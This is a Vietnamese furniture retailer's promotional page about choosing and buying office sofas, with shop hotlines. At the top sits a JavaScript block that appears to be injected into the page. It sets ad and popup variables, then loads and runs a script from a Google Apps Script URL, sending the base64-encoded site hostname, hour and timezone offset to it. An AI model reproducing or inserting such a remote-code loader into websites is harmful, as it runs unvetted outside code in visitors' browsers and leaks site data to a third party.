var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Mua sofa văn phòng ở đâu? Các loại sofa văn phòng được ưa chuộng

Quý vị đang băn khoăn mua sofa văn phòng ở đâu? Nên chọn loại ghế sofa nào cho văn phòng làm việc? Dưới đây là những thông tin tư vấn hữu ích dành cho quý vị. Hãy tham khảo ngay trước khi đi chọn mua bàn ghế sofa văn phòng đẹp.

Các loại sofa văn phòng được ưa chuộng hiện nay

Trên thị trường có nhiều mẫu ghế sofa văn phòng đẹp. Tuy nhiên, không phải loại ghế sofa nào cũng thích hợp sử dụng trong văn phòng làm việc. Hiện nay, những mẫu bàn ghế sofa bộ và ghế sofa góc văn phòng hiện nay đang rất được ưa chuộng.

Mua sofa văn phòng ở đâu
Ghế sofa góc văn phòng được ưa chuộng

Mỗi loại ghế sofa khác nhau sẽ có những ưu và nhược điểm khác nhau, thích hợp sử dụng cho từng không gian. Nếu quý vị lựa chọn bàn ghế tiếp khách văn phòng nhỏ thì nên lựa chọn ghế sofa góc chữ L nhỏ gọn. Còn nếu không gian rộng rãi hơn thì nên lựa chọn ghế sofa bộ cho văn phòng làm việc. Vậy, nên mua sofa văn phòng ở đâu uy tín? Dưới đây là những thông tin tư vấn hữu ích dành cho quý vị.

Nên mua sofa văn phòng ở đâu?

Quý vị muốn mua bàn ghế sofa phòng khách hoặc ghế sofa cho văn phòng hãy tới ngay siêu thị Nội Thất Xinh. Đây là địa chỉ chuyên cung cấp những mẫu ghế sofa chất lượng cao, uy tín ở Hà Nội.

mua sofa văn phòng ở đâu
Nên mua ghế sofa văn phòng ở đâu?

Ngoài những mẫu ghế sofa được sản xuất trực tiếp tại Nội Thất Xinh, chúng tôi còn là đơn vị cung cấp những dòng ghế sofa nhập khẩu cao cấp dành cho quý vị tham khảo. Chúng tôi có những mẫu ghế sofa da thật nhập khẩu từ Malaysia, Italia cho quý vị tham khảo trực tiếp trước khi mua.

Bên cạnh đó, chúng tôi còn cung cấp thêm sản phẩm thảm văn phòng chất lượng cao, nhằm mang tới không gian nội thất sang trọng hơn dành cho quý vị.

Mua sofa văn phòng ở đâu? Hãy tới ngay siêu thị Nội Thất Xinh để được tư vấn. Hoặc liên hệ với chúng tôi theo số Hotline 0243 905 9999 – 0975 90 3333 để được giải đáp.

=> Xem thêm: Cần lưu ý gì khi tìm mua sofa cho phòng khách?